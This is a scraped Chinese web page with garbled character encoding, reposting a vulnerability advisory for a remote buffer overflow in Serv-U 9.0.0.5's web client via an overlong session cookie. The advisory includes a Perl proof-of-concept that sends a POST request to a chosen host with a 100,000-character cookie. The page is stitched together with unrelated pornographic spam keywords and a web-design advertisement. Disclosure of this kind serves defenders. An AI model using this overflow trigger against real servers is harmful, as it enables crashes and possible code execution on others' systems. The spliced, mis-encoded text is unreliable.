日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
Serv-UWeb客戶端HTTP請求遠程溢出漏洞

Serv-U Web客戶端HTTP請求遠程溢出漏洞

成都創(chuàng)新互聯(lián)-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價比涼城網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式?jīng)龀蔷W(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋涼城地區(qū)。費用合理售后完善,10年實體公司更值得信賴。

影響版本:

RhinoSoft Serv-U 9.0.0.5

漏洞描述:

BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服務(wù)程序。

Serv-U產(chǎn)品捆綁有一個簡單的基于瀏覽器的傳輸客戶端,這個客戶端在處理超長的會話Cookie時存在緩沖區(qū)溢出漏洞。如果用戶受騙連接到了惡意服務(wù)器并向WebClient HTTP服務(wù)返回了超長的會話Cookie,就可能觸發(fā)這個溢出,導(dǎo)致在用戶機器上執(zhí)行任意指令。

---snip--- 
use IO::Socket; 

$|=1; 
$a = "A" x 100000; 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '80', 
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n" 
."Host: $ARGV[0]\r\n" 
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_
d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814
06246bf8$a\r\n" 
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" 
."Content-Length: 0\r\n\r\n"; 

while (<$sock>) { 
    print; 
} 
---snip--- 


本文標題:Serv-UWeb客戶端HTTP請求遠程溢出漏洞
網(wǎng)站鏈接:http://www.dlmjj.cn/article/dhsgdgc.html